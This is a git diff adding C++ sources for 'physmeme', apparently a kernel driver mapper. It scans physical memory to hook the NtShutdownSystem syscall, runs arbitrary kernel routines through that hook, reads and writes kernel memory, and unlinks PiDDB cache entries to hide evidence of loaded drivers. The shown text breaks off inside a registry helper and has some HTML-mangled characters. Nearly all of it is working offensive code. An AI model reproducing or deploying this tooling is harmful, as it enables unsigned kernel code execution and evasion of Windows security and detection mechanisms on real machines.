This reverts commit c960f3c60e
merge-requests/1/head
parent
c960f3c60e
commit
eb768dda0c
@ -0,0 +1,215 @@
|
||||
/*
|
||||
This is free and unencumbered software released into the public domain.
|
||||
|
||||
Anyone is free to copy, modify, publish, use, compile, sell, or
|
||||
distribute this software, either in source code form or as a compiled
|
||||
binary, for any purpose, commercial or non-commercial, and by any
|
||||
means.
|
||||
|
||||
In jurisdictions that recognize copyright laws, the author or authors
|
||||
of this software dedicate any and all copyright interest in the
|
||||
software to the public domain. We make this dedication for the benefit
|
||||
of the public at large and to the detriment of our heirs and
|
||||
successors. We intend this dedication to be an overt act of
|
||||
relinquishment in perpetuity of all present and future rights to this
|
||||
software under copyright law.
|
||||
|
||||
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
|
||||
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
|
||||
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
|
||||
IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
|
||||
OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
|
||||
ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
|
||||
OTHER DEALINGS IN THE SOFTWARE.
|
||||
|
||||
For more information, please refer to <http://unlicense.org>
|
||||
|
||||
|
||||
!!!!!!!!!!!!!!!!!!!!!!!!!!! This code was created by not-wlan (wlan). all credit for this header and source file goes to him !!!!!!!!!!!!!!!!!!!!!!!!!!!!!
|
||||
*/
|
||||
|
||||
#include <fstream>
|
||||
#include "../drv_image/drv_image.h"
|
||||
|
||||
namespace physmeme
|
||||
{
|
||||
drv_image::drv_image(std::vector<uint8_t> image) : m_image(std::move(image))
|
||||
{
|
||||
m_dos_header = reinterpret_cast<PIMAGE_DOS_HEADER>(m_image.data());
|
||||
m_nt_headers = reinterpret_cast<PIMAGE_NT_HEADERS64>((uintptr_t)m_dos_header + m_dos_header->e_lfanew);
|
||||
m_section_header = reinterpret_cast<IMAGE_SECTION_HEADER*>((uintptr_t)(&m_nt_headers->OptionalHeader) + m_nt_headers->FileHeader.SizeOfOptionalHeader);
|
||||
}
|
||||
|
||||
size_t drv_image::size() const
|
||||
{
|
||||
return m_nt_headers->OptionalHeader.SizeOfImage;
|
||||
}
|
||||
|
||||
uintptr_t drv_image::entry_point() const
|
||||
{
|
||||
return m_nt_headers->OptionalHeader.AddressOfEntryPoint;
|
||||
}
|
||||
|
||||
void drv_image::map()
|
||||
{
|
||||
m_image_mapped.clear();
|
||||
m_image_mapped.resize(m_nt_headers->OptionalHeader.SizeOfImage);
|
||||
std::copy_n(m_image.begin(), m_nt_headers->OptionalHeader.SizeOfHeaders, m_image_mapped.begin());
|
||||
|
||||
for (size_t i = 0; i < m_nt_headers->FileHeader.NumberOfSections; ++i)
|
||||
{
|
||||
const auto& section = m_section_header[i];
|
||||
const auto target = (uintptr_t)m_image_mapped.data() + section.VirtualAddress;
|
||||
const auto source = (uintptr_t)m_dos_header + section.PointerToRawData;
|
||||
std::copy_n(m_image.begin() + section.PointerToRawData, section.SizeOfRawData, m_image_mapped.begin() + section.VirtualAddress);
|
||||
printf("[+] copying [%s] 0x%p -> 0x%p [0x%04X]\n", §ion.Name[0], (void*)source, (void*)target, section.SizeOfRawData);
|
||||
}
|
||||
}
|
||||
|
||||
bool drv_image::process_relocation(uintptr_t image_base_delta, uint16_t data, uint8_t* relocation_base)
|
||||
{
|
||||
#define IMR_RELOFFSET(x) (x & 0xFFF)
|
||||
|
||||
switch (data >> 12 & 0xF)
|
||||
{
|
||||
case IMAGE_REL_BASED_HIGH:
|
||||
{
|
||||
const auto raw_address = reinterpret_cast<int16_t*>(relocation_base + IMR_RELOFFSET(data));
|
||||
*raw_address += static_cast<unsigned long>(HIWORD(image_base_delta));
|
||||
break;
|
||||
}
|
||||
case IMAGE_REL_BASED_LOW:
|
||||
{
|
||||
const auto raw_address = reinterpret_cast<int16_t*>(relocation_base + IMR_RELOFFSET(data));
|
||||
*raw_address += static_cast<unsigned long>(LOWORD(image_base_delta));
|
||||
break;
|
||||
}
|
||||
case IMAGE_REL_BASED_HIGHLOW:
|
||||
{
|
||||
const auto raw_address = reinterpret_cast<size_t*>(relocation_base + IMR_RELOFFSET(data));
|
||||
*raw_address += static_cast<size_t>(image_base_delta);
|
||||
break;
|
||||
}
|
||||
case IMAGE_REL_BASED_DIR64:
|
||||
{
|
||||
auto UNALIGNED raw_address = reinterpret_cast<DWORD_PTR UNALIGNED*>(relocation_base + IMR_RELOFFSET(data));
|
||||
*raw_address += image_base_delta;
|
||||
break;
|
||||
}
|
||||
case IMAGE_REL_BASED_ABSOLUTE: // No action required
|
||||
case IMAGE_REL_BASED_HIGHADJ: // no action required
|
||||
{
|
||||
break;
|
||||
}
|
||||
default:
|
||||
{
|
||||
return false;
|
||||
}
|
||||
|
||||
}
|
||||
#undef IMR_RELOFFSET
|
||||
|
||||
return true;
|
||||
}
|
||||
|
||||
|
||||
void drv_image::relocate(void* base) const
|
||||
{
|
||||
if (m_nt_headers->FileHeader.Characteristics & IMAGE_FILE_RELOCS_STRIPPED)
|
||||
return;
|
||||
|
||||
ULONG total_count_bytes;
|
||||
const auto nt_headers = ImageNtHeader((void*)m_image_mapped.data());
|
||||
auto relocation_directory = (PIMAGE_BASE_RELOCATION)::ImageDirectoryEntryToData(nt_headers, TRUE, IMAGE_DIRECTORY_ENTRY_BASERELOC, &total_count_bytes);
|
||||
auto image_base_delta = static_cast<uintptr_t>(reinterpret_cast<uintptr_t>(base) - (nt_headers->OptionalHeader.ImageBase));
|
||||
auto relocation_size = total_count_bytes;
|
||||
|
||||
// This should check (DllCharacteristics & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE) too but lots of drivers do not have it set due to WDK defaults
|
||||
const bool doRelocations = image_base_delta != 0 && relocation_size > 0;
|
||||
|
||||
if (!doRelocations)
|
||||
{
|
||||
printf("[+] no relocations needed\n");
|
||||
return;
|
||||
}
|
||||
|
||||
void* relocation_end = reinterpret_cast<uint8_t*>(relocation_directory) + relocation_size;
|
||||
|
||||
while (relocation_directory < relocation_end)
|
||||
{
|
||||
auto relocation_base = ::ImageRvaToVa(nt_headers, (void*)m_image_mapped.data(), relocation_directory->VirtualAddress, nullptr);
|
||||
|
||||
auto num_relocs = (relocation_directory->SizeOfBlock - 8) >> 1;
|
||||
|
||||
auto relocation_data = reinterpret_cast<PWORD>(relocation_directory + 1);
|
||||
|
||||
for (unsigned long i = 0; i < num_relocs; ++i, ++relocation_data)
|
||||
{
|
||||
if (process_relocation(image_base_delta, *relocation_data, (uint8_t*)relocation_base) == FALSE)
|
||||
{
|
||||
printf("[+] failed to relocate!");
|
||||
return;
|
||||
}
|
||||
}
|
||||
|
||||
relocation_directory = reinterpret_cast<PIMAGE_BASE_RELOCATION>(relocation_data);
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
template<typename T>
|
||||
__forceinline T* ptr_add(void* base, uintptr_t offset)
|
||||
{
|
||||
return (T*)(uintptr_t)base + offset;
|
||||
}
|
||||
|
||||
void drv_image::fix_imports(const std::function<uintptr_t(std::string_view)> get_module, const std::function<uintptr_t(const char*, const char*)> get_function)
|
||||
{
|
||||
ULONG size;
|
||||
auto import_descriptors = static_cast<PIMAGE_IMPORT_DESCRIPTOR>(::ImageDirectoryEntryToData(m_image.data(), FALSE, IMAGE_DIRECTORY_ENTRY_IMPORT, &size));
|
||||
|
||||
if (import_descriptors == nullptr)
|
||||
{
|
||||
printf("[+] no imports!\n");
|
||||
return;
|
||||
}
|
||||
|
||||
for (; import_descriptors->Name; import_descriptors++)
|
||||
{
|
||||
IMAGE_THUNK_DATA* image_thunk_data;
|
||||
|
||||
const auto module_name = get_rva<char>(import_descriptors->Name);
|
||||
const auto module_base = get_module(module_name);
|
||||
printf("[+] processing module: %s [0x%I64X]\n", module_name, module_base);
|
||||
|
||||
if (import_descriptors->OriginalFirstThunk)
|
||||
image_thunk_data = get_rva<IMAGE_THUNK_DATA>(import_descriptors->OriginalFirstThunk);
|
||||
else
|
||||
image_thunk_data = get_rva<IMAGE_THUNK_DATA>(import_descriptors->FirstThunk);
|
||||
auto image_func_data = get_rva<IMAGE_THUNK_DATA64>(import_descriptors->FirstThunk);
|
||||
;
|
||||
|
||||
for (; image_thunk_data->u1.AddressOfData; image_thunk_data++, image_func_data++)
|
||||
{
|
||||
uintptr_t function_address;
|
||||
const auto ordinal = (image_thunk_data->u1.Ordinal & IMAGE_ORDINAL_FLAG64) != 0;
|
||||
const auto image_import_by_name = get_rva<IMAGE_IMPORT_BY_NAME>(*(DWORD*)image_thunk_data);
|
||||
const auto name_of_import = static_cast<char*>(image_import_by_name->Name);
|
||||
function_address = get_function(module_name, name_of_import);
|
||||
|
||||
printf("[+] function: %s [0x%I64X]\n", name_of_import, function_address);
|
||||
image_func_data->u1.Function = function_address;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
void* drv_image::data()
|
||||
{
|
||||
return m_image_mapped.data();
|
||||
}
|
||||
|
||||
size_t drv_image::header_size()
|
||||
{
|
||||
return m_nt_headers->OptionalHeader.SizeOfHeaders;
|
||||
}
|
||||
}
|
@ -0,0 +1,77 @@
|
||||
/*
|
||||
This is free and unencumbered software released into the public domain.
|
||||
|
||||
Anyone is free to copy, modify, publish, use, compile, sell, or
|
||||
distribute this software, either in source code form or as a compiled
|
||||
binary, for any purpose, commercial or non-commercial, and by any
|
||||
means.
|
||||
|
||||
In jurisdictions that recognize copyright laws, the author or authors
|
||||
of this software dedicate any and all copyright interest in the
|
||||
software to the public domain. We make this dedication for the benefit
|
||||
of the public at large and to the detriment of our heirs and
|
||||
successors. We intend this dedication to be an overt act of
|
||||
relinquishment in perpetuity of all present and future rights to this
|
||||
software under copyright law.
|
||||
|
||||
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
|
||||
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
|
||||
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
|
||||
IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
|
||||
OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
|
||||
ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
|
||||
OTHER DEALINGS IN THE SOFTWARE.
|
||||
|
||||
For more information, please refer to <http://unlicense.org>
|
||||
|
||||
|
||||
!!!!!!!!!!!!!!!!!!!!!!!!!!! This code was created by not-wlan (wlan). all credit for this header and source file goes to him !!!!!!!!!!!!!!!!!!!!!!!!!!!!!
|
||||
*/
|
||||
|
||||
|
||||
#pragma once
|
||||
#include <vector>
|
||||
#define WIN32_NO_STATUS
|
||||
#include <Windows.h>
|
||||
#include <Winternl.h>
|
||||
#undef WIN32_NO_STATUS
|
||||
#include <ntstatus.h>
|
||||
|
||||
#include <functional>
|
||||
#include <DbgHelp.h>
|
||||
#include <variant>
|
||||
#include "../util/nt.hpp"
|
||||
|
||||
#pragma comment(lib, "Dbghelp.lib")
|
||||
namespace physmeme
|
||||
{
|
||||
class drv_image
|
||||
{
|
||||
std::vector<uint8_t> m_image;
|
||||
std::vector<uint8_t> m_image_mapped;
|
||||
PIMAGE_DOS_HEADER m_dos_header = nullptr;
|
||||
PIMAGE_NT_HEADERS64 m_nt_headers = nullptr;
|
||||
PIMAGE_SECTION_HEADER m_section_header = nullptr;
|
||||
|
||||
public:
|
||||
explicit drv_image(std::vector<uint8_t> image);
|
||||
size_t size() const;
|
||||
uintptr_t entry_point() const;
|
||||
void map();
|
||||
static bool process_relocation(size_t image_base_delta, uint16_t data, uint8_t* relocation_base);
|
||||
void relocate(void* base) const;
|
||||
|
||||
template<typename T>
|
||||
__forceinline T* get_rva(const unsigned long offset)
|
||||
{
|
||||
return (T*)::ImageRvaToVa(m_nt_headers, m_image.data(), offset, nullptr);
|
||||
}
|
||||
|
||||
void fix_imports(
|
||||
const std::function<uintptr_t(std::string_view)> get_module,
|
||||
const std::function<uintptr_t(const char*, const char*)> get_function
|
||||
);
|
||||
void* data();
|
||||
size_t header_size();
|
||||
};
|
||||
}
|
@ -0,0 +1,346 @@
|
||||
#include "kernel_ctx.h"
|
||||
|
||||
namespace physmeme
|
||||
{
|
||||
kernel_ctx::kernel_ctx()
|
||||
{
|
||||
if (psyscall_func.load() || nt_page_offset || ntoskrnl_buffer)
|
||||
return;
|
||||
|
||||
nt_rva = reinterpret_cast<std::uint32_t>(
|
||||
util::get_kernel_export(
|
||||
"ntoskrnl.exe",
|
||||
syscall_hook.first.data(),
|
||||
true
|
||||
));
|
||||
|
||||
nt_page_offset = nt_rva % page_size;
|
||||
ntoskrnl_buffer = reinterpret_cast<std::uint8_t*>(
|
||||
LoadLibraryEx("ntoskrnl.exe", NULL, DONT_RESOLVE_DLL_REFERENCES)
|
||||
);
|
||||
|
||||
std::vector<std::thread> search_threads;
|
||||
//--- for each physical memory range, make a thread to search it
|
||||
for (auto ranges : util::pmem_ranges)
|
||||
search_threads.emplace_back(std::thread(
|
||||
&kernel_ctx::map_syscall,
|
||||
this,
|
||||
ranges.first,
|
||||
ranges.second
|
||||
));
|
||||
|
||||
for (std::thread& search_thread : search_threads)
|
||||
search_thread.join();
|
||||
}
|
||||
|
||||
void kernel_ctx::map_syscall(std::uintptr_t begin, std::uintptr_t end) const
|
||||
{
|
||||
//if the physical memory range is less then or equal to 2mb
|
||||
if (begin + end <= 0x1000 * 512)
|
||||
{
|
||||
auto page_va = physmeme::map_phys(begin + nt_page_offset, end);
|
||||
if (page_va)
|
||||
{
|
||||
// scan every page of the physical memory range
|
||||
for (auto page = page_va; page < page_va + end; page += 0x1000)
|
||||
if (!is_page_found.load()) // keep scanning until its found
|
||||
if (!memcmp(reinterpret_cast<void*>(page), ntoskrnl_buffer + nt_rva, 32))
|
||||
{
|
||||
//
|
||||
// this checks to ensure that the syscall does indeed work. if it doesnt, we keep looking!
|
||||
//
|
||||
psyscall_func.store((void*)page);
|
||||
auto my_proc_base = reinterpret_cast<std::uintptr_t>(GetModuleHandleA(NULL));
|
||||
auto my_proc_base_from_syscall = reinterpret_cast<std::uintptr_t>(get_proc_base(GetCurrentProcessId()));
|
||||
|
||||
if (my_proc_base != my_proc_base_from_syscall)
|
||||
continue;
|
||||
|
||||
is_page_found.store(true);
|
||||
return;
|
||||
}
|
||||
physmeme::unmap_phys(page_va, end);
|
||||
}
|
||||
}
|
||||
else // else the range is bigger then 2mb
|
||||
{
|
||||
auto remainder = (begin + end) % (0x1000 * 512);
|
||||
|
||||
// loop over 2m chunks
|
||||
for (auto range = begin; range < begin + end; range += 0x1000 * 512)
|
||||
{
|
||||
auto page_va = physmeme::map_phys(range + nt_page_offset, 0x1000 * 512);
|
||||
if (page_va)
|
||||
{
|
||||
// loop every page of 2mbs (512)
|
||||
for (auto page = page_va; page < page_va + 0x1000 * 512; page += 0x1000)
|
||||
{
|
||||
if (!is_page_found.load())
|
||||
{
|
||||
if (!memcmp(reinterpret_cast<void*>(page), ntoskrnl_buffer + nt_rva, 32))
|
||||
{
|
||||
//
|
||||
// this checks to ensure that the syscall does indeed work. if it doesnt, we keep looking!
|
||||
//
|
||||
psyscall_func.store((void*)page);
|
||||
auto my_proc_base = reinterpret_cast<std::uintptr_t>(GetModuleHandle(NULL));
|
||||
auto my_proc_base_from_syscall = reinterpret_cast<std::uintptr_t>(get_proc_base(GetCurrentProcessId()));
|
||||
|
||||
if (my_proc_base != my_proc_base_from_syscall)
|
||||
continue;
|
||||
|
||||
is_page_found.store(true);
|
||||
return;
|
||||
}
|
||||
}
|
||||
}
|
||||
physmeme::unmap_phys(page_va, 0x1000 * 512);
|
||||
}
|
||||
}
|
||||
|
||||
// map the remainder and check each page of it
|
||||
auto page_va = physmeme::map_phys(begin + end - remainder + nt_page_offset, remainder);
|
||||
if (page_va)
|
||||
{
|
||||
for (auto page = page_va; page < page_va + remainder; page += 0x1000)
|
||||
{
|
||||
if (!is_page_found.load())
|
||||
{
|
||||
if (!memcmp(reinterpret_cast<void*>(page), ntoskrnl_buffer + nt_rva, 32))
|
||||
{
|
||||
//
|
||||
// this checks to ensure that the syscall does indeed work. if it doesnt, we keep looking!
|
||||
//
|
||||
psyscall_func.store((void*)page);
|
||||
auto my_proc_base = reinterpret_cast<std::uintptr_t>(GetModuleHandle(NULL));
|
||||
auto my_proc_base_from_syscall = reinterpret_cast<std::uintptr_t>(get_proc_base(GetCurrentProcessId()));
|
||||
|
||||
if (my_proc_base != my_proc_base_from_syscall)
|
||||
continue;
|
||||
|
||||
is_page_found.store(true);
|
||||
return;
|
||||
}
|
||||
}
|
||||
}
|
||||
physmeme::unmap_phys(page_va, remainder);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
bool kernel_ctx::clear_piddb_cache(const std::string& file_name, const std::uint32_t timestamp)
|
||||
{
|
||||
static const auto piddb_lock =
|
||||
util::memory::get_piddb_lock();
|
||||
|
||||
static const auto piddb_table =
|
||||
util::memory::get_piddb_table();
|
||||
|
||||
if (!piddb_lock || !piddb_table)
|
||||
return false;
|
||||
|
||||
static const auto ex_acquire_resource =
|
||||
util::get_kernel_export(
|
||||
"ntoskrnl.exe",
|
||||
"ExAcquireResourceExclusiveLite"
|
||||
);
|
||||
|
||||
static const auto lookup_element_table =
|
||||
util::get_kernel_export(
|
||||
"ntoskrnl.exe",
|
||||
"RtlLookupElementGenericTableAvl"
|
||||
);
|
||||
|
||||
static const auto release_resource =
|
||||
util::get_kernel_export(
|
||||
"ntoskrnl.exe",
|
||||
"ExReleaseResourceLite"
|
||||
);
|
||||
|
||||
static const auto delete_table_entry =
|
||||
util::get_kernel_export(
|
||||
"ntoskrnl.exe",
|
||||
"RtlDeleteElementGenericTableAvl"
|
||||
);
|
||||
|
||||
if (!ex_acquire_resource || !lookup_element_table || !release_resource)
|
||||
return false;
|
||||
|
||||
PiDDBCacheEntry cache_entry;
|
||||
const auto drv_name = std::wstring(file_name.begin(), file_name.end());
|
||||
cache_entry.time_stamp = timestamp;
|
||||
RtlInitUnicodeString(&cache_entry.driver_name, drv_name.data());
|
||||
|
||||
//
|
||||
// ExAcquireResourceExclusiveLite
|
||||
//
|
||||
if (!syscall<ExAcquireResourceExclusiveLite>(ex_acquire_resource, piddb_lock, true))
|
||||
return false;
|
||||
|
||||
//
|
||||
// RtlLookupElementGenericTableAvl
|
||||
//
|
||||
PIDCacheobj* found_entry_ptr =
|
||||
syscall<RtlLookupElementGenericTableAvl>(
|
||||
lookup_element_table,
|
||||
piddb_table,
|
||||
reinterpret_cast<void*>(&cache_entry)
|
||||
);
|
||||
|
||||
if (found_entry_ptr)
|
||||
{
|
||||
|
||||
//
|
||||
// unlink entry.
|
||||
//
|
||||
PIDCacheobj found_entry = read_kernel<PIDCacheobj>(found_entry_ptr);
|
||||
LIST_ENTRY NextEntry = read_kernel<LIST_ENTRY>(found_entry.list.Flink);
|
||||
LIST_ENTRY PrevEntry = read_kernel<LIST_ENTRY>(found_entry.list.Blink);
|
||||
|
||||
PrevEntry.Flink = found_entry.list.Flink;
|
||||
NextEntry.Blink = found_entry.list.Blink;
|
||||
|
||||
write_kernel<LIST_ENTRY>(found_entry.list.Blink, PrevEntry);
|
||||
write_kernel<LIST_ENTRY>(found_entry.list.Flink, NextEntry);
|
||||
|
||||
//
|
||||
// delete entry.
|
||||
//
|
||||
syscall<RtlDeleteElementGenericTableAvl>(delete_table_entry, piddb_table, found_entry_ptr);
|
||||
|
||||
//
|
||||
// ensure the entry is 0
|
||||
//
|
||||
auto result = syscall<RtlLookupElementGenericTableAvl>(
|
||||
lookup_element_table,
|
||||
piddb_table,
|
||||
reinterpret_cast<void*>(&cache_entry)
|
||||
);
|
||||
|
||||
syscall<ExReleaseResourceLite>(release_resource, piddb_lock);
|
||||
return !result;
|
||||
}
|
||||
syscall<ExReleaseResourceLite>(release_resource, piddb_lock);
|
||||
return false;
|
||||
}
|
||||
|
||||
void* kernel_ctx::allocate_pool(std::size_t size, POOL_TYPE pool_type)
|
||||
{
|
||||
static const auto ex_alloc_pool =
|
||||
util::get_kernel_export(
|
||||
"ntoskrnl.exe",
|
||||
"ExAllocatePool"
|
||||
);
|
||||
|
||||
return syscall<ExAllocatePool>(
|
||||
ex_alloc_pool,
|
||||
pool_type,
|
||||
size
|
||||
);
|
||||
}
|
||||
|
||||
void* kernel_ctx::allocate_pool(std::size_t size, ULONG pool_tag, POOL_TYPE pool_type)
|
||||
{
|
||||
static const auto ex_alloc_pool_with_tag =
|
||||
util::get_kernel_export(
|
||||
"ntoskrnl.exe",
|
||||
"ExAllocatePoolWithTag"
|
||||
);
|
||||
|
||||
return syscall<ExAllocatePoolWithTag>(
|
||||
ex_alloc_pool_with_tag,
|
||||
pool_type,
|
||||
size,
|
||||
pool_tag
|
||||
);
|
||||
}
|
||||
|
||||
void kernel_ctx::read_kernel(void* addr, void* buffer, std::size_t size)
|
||||
{
|
||||
static const auto mm_copy_memory =
|
||||
util::get_kernel_export(
|
||||
"ntoskrnl.exe",
|
||||
"RtlCopyMemory"
|
||||
);
|
||||
|
||||
syscall<decltype(&memcpy)>(
|
||||
mm_copy_memory,
|
||||
buffer,
|
||||
addr,
|
||||
size
|
||||
);
|
||||
}
|
||||
|
||||
void kernel_ctx::write_kernel(void* addr, void* buffer, std::size_t size)
|
||||
{
|
||||
static const auto mm_copy_memory =
|
||||
util::get_kernel_export(
|
||||
"ntoskrnl.exe",
|
||||
"RtlCopyMemory"
|
||||
);
|
||||
|
||||
syscall<decltype(&memcpy)>(
|
||||
mm_copy_memory,
|
||||
addr,
|
||||
buffer,
|
||||
size
|
||||
);
|
||||
}
|
||||
|
||||
void kernel_ctx::zero_kernel_memory(void* addr, std::size_t size)
|
||||
{
|
||||
static const auto rtl_zero_memory =
|
||||
util::get_kernel_export(
|
||||
"ntoskrnl.exe",
|
||||
"RtlZeroMemory"
|
||||
);
|
||||
|
||||
syscall<decltype(&RtlSecureZeroMemory)>(
|
||||
rtl_zero_memory,
|
||||
addr,
|
||||
size
|
||||
);
|
||||
}
|
||||
|
||||
PEPROCESS kernel_ctx::get_peprocess(unsigned pid) const
|
||||
{
|
||||
if (!pid)
|
||||
return {};
|
||||
|
||||
PEPROCESS proc;
|
||||
static auto get_peprocess_from_pid =
|
||||
util::get_kernel_export(
|
||||
"ntoskrnl.exe",
|
||||
"PsLookupProcessByProcessId"
|
||||
);
|
||||
|
||||
syscall<PsLookupProcessByProcessId>(
|
||||
get_peprocess_from_pid,
|
||||
(HANDLE)pid,
|
||||
&proc
|
||||
);
|
||||
return proc;
|
||||
}
|
||||
|
||||
void* kernel_ctx::get_proc_base(unsigned pid) const
|
||||
{
|
||||
if (!pid)
|
||||
return {};
|
||||
|
||||
const auto peproc = get_peprocess(pid);
|
||||
|
||||
if (!peproc)
|
||||
return {};
|
||||
|
||||
static auto get_section_base =
|
||||
util::get_kernel_export(
|
||||
"ntoskrnl.exe",
|
||||
"PsGetProcessSectionBaseAddress"
|
||||
);
|
||||
|
||||
return syscall<PsGetProcessSectionBaseAddress>(
|
||||
get_section_base,
|
||||
peproc
|
||||
);
|
||||
}
|
||||
}
|
@ -0,0 +1,133 @@
|
||||
#pragma once
|
||||
#include <windows.h>
|
||||
#include <iostream>
|
||||
#include <string_view>
|
||||
#include <vector>
|
||||
#include <thread>
|
||||
#include <atomic>
|
||||
|
||||
#include "../util/util.hpp"
|
||||
#include "../physmeme/physmeme.hpp"
|
||||
#include "../util/hook.hpp"
|
||||
|
||||
namespace physmeme
|
||||
{
|
||||
//
|
||||
// offset of function into a physical page
|
||||
// used for comparing bytes when searching
|
||||
//
|
||||
inline std::uint16_t nt_page_offset{};
|
||||
|
||||
//
|
||||
// rva of nt function we are going to hook
|
||||
//
|
||||
inline std::uint32_t nt_rva{};
|
||||
|
||||
//
|
||||
// base address of ntoskrnl (inside of this process)
|
||||
//
|
||||
inline const std::uint8_t* ntoskrnl_buffer{};
|
||||
|
||||
//
|
||||
// has the page been found yet?
|
||||
//
|
||||
inline std::atomic<bool> is_page_found = false;
|
||||
|
||||
//
|
||||
// mapping of a syscalls physical memory (for installing hooks)
|
||||
//
|
||||
inline std::atomic<void*> psyscall_func{};
|
||||
|
||||
//
|
||||
// you can edit this how you choose, im hooking NtShutdownSystem.
|
||||
//
|
||||
inline const std::pair<std::string_view, std::string_view> syscall_hook = { "NtShutdownSystem", "ntdll.dll" };
|
||||
|
||||
class kernel_ctx
|
||||
{
|
||||
public:
|
||||
//
|
||||
// default constructor
|
||||
//
|
||||
kernel_ctx();
|
||||
|
||||
//
|
||||
// allocate kernel pool of desired size and type
|
||||
//
|
||||
void* allocate_pool(std::size_t size, POOL_TYPE pool_type = NonPagedPool);
|
||||
|
||||
//
|
||||
// allocate kernel pool of size, pool tag, and type
|
||||
//
|
||||
void* allocate_pool(std::size_t size, ULONG pool_tag = 'MEME', POOL_TYPE pool_type = NonPagedPool);
|
||||
|
||||
//
|
||||
// read kernel memory with RtlCopyMemory
|
||||
//
|
||||
void read_kernel(void* addr, void* buffer, std::size_t size);
|
||||
|
||||
//
|
||||
// write kernel memory with RtlCopyMemory
|
||||
//
|
||||
void write_kernel(void* addr, void* buffer, std::size_t size);
|
||||
|
||||
//
|
||||
// zero kernel memory using RtlZeroMemory
|
||||
//
|
||||
void zero_kernel_memory(void* addr, std::size_t size);
|
||||
|
||||
//
|
||||
// clear piddb cache of a specific driver
|
||||
//
|
||||
bool clear_piddb_cache(const std::string& file_name, const std::uint32_t timestamp);
|
||||
|
||||
template <class T>
|
||||
T read_kernel(void* addr)
|
||||
{
|
||||
if (!addr)
|
||||
return {};
|
||||
T buffer;
|
||||
read_kernel(addr, (void*)&buffer, sizeof(T));
|
||||
return buffer;
|
||||
}
|
||||
|
||||
template <class T>
|
||||
void write_kernel(void* addr, const T& data)
|
||||
{
|
||||
if (!addr)
|
||||
return;
|
||||
write_kernel(addr, (void*)&data, sizeof(T));
|
||||
}
|
||||
|
||||
template <class T, class ... Ts>
|
||||
std::invoke_result_t<T, Ts...> syscall(void* addr, Ts ... args) const
|
||||
{
|
||||
static const auto proc =
|
||||
GetProcAddress(
|
||||
GetModuleHandleA("ntdll.dll"),
|
||||
syscall_hook.first.data()
|
||||
);
|
||||
|
||||
hook::make_hook(psyscall_func, addr);
|
||||
auto result = reinterpret_cast<T>(proc)(args ...);
|
||||
hook::remove(psyscall_func);
|
||||
return result;
|
||||
}
|
||||
private:
|
||||
|
||||
//
|
||||
// find and map the physical page of a syscall into this process
|
||||
//
|
||||
void map_syscall(std::uintptr_t begin, std::uintptr_t end) const;
|
||||
|
||||
//
|
||||
// used in conjunction with get_process_base.
|
||||
//
|
||||
PEPROCESS get_peprocess(unsigned pid) const;
|
||||
|
||||
//
|
||||
// get base address of process (used to compare and ensure we find the right page).
|
||||
//
|
||||
void* get_proc_base(unsigned pid) const;
|
||||
};
|
||||
}
|
@ -0,0 +1,281 @@
|
||||
/*
|
||||
MIT License
|
||||
|
||||
Copyright (c) 2020 xerox
|
||||
|
||||
Permission is hereby granted, free of charge, to any person obtaining a copy
|
||||
of this software and associated documentation files (the "Software"), to deal
|
||||
in the Software without restriction, including without limitation the rights
|
||||
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
|
||||
copies of the Software, and to permit persons to whom the Software is
|
||||
furnished to do so, subject to the following conditions:
|
||||
|
||||
The above copyright notice and this permission notice shall be included in all
|
||||
copies or substantial portions of the Software.
|
||||
|
||||
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
|
||||
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
|
||||
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
|
||||
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
|
||||
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
|
||||
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
|
||||
SOFTWARE.
|
||||
*/
|
||||
|
||||
|
||||
#pragma once
|
||||
#include <Windows.h>
|
||||
#include <Winternl.h>
|
||||
#include <string>
|
||||
#include <fstream>
|
||||
#include <filesystem>
|
||||
|
||||
#pragma comment(lib, "ntdll.lib")
|
||||
using nt_load_driver_t = NTSTATUS(__fastcall*)(PUNICODE_STRING);
|
||||
using nt_unload_driver_t = NTSTATUS(__fastcall*)(PUNICODE_STRING);
|
||||
|
||||
namespace driver
|
||||
{
|
||||
namespace util
|
||||
{
|
||||
inline bool delete_service_entry(const std::string& service_name)
|
||||
{
|
||||
HKEY reg_handle;
|
||||
static const std::string reg_key("System\\CurrentControlSet\\Services\\");
|
||||
|
||||
auto result = RegOpenKeyA(
|
||||
HKEY_LOCAL_MACHINE,
|
||||
reg_key.c_str(),
|
||||
®_handle
|
||||
);
|
||||
|
||||
return ERROR_SUCCESS == RegDeleteKeyA(reg_handle, service_name.data()) && ERROR_SUCCESS == RegCloseKey(reg_handle);;
|
||||
}
|
||||
|
||||
inline bool create_service_entry(const std::string& drv_path, const std::string& service_name)
|
||||
{
|
||||
HKEY reg_handle;
|
||||
std::string reg_key("System\\CurrentControlSet\\Services\\");
|
||||
reg_key += service_name;
|
||||
|
||||
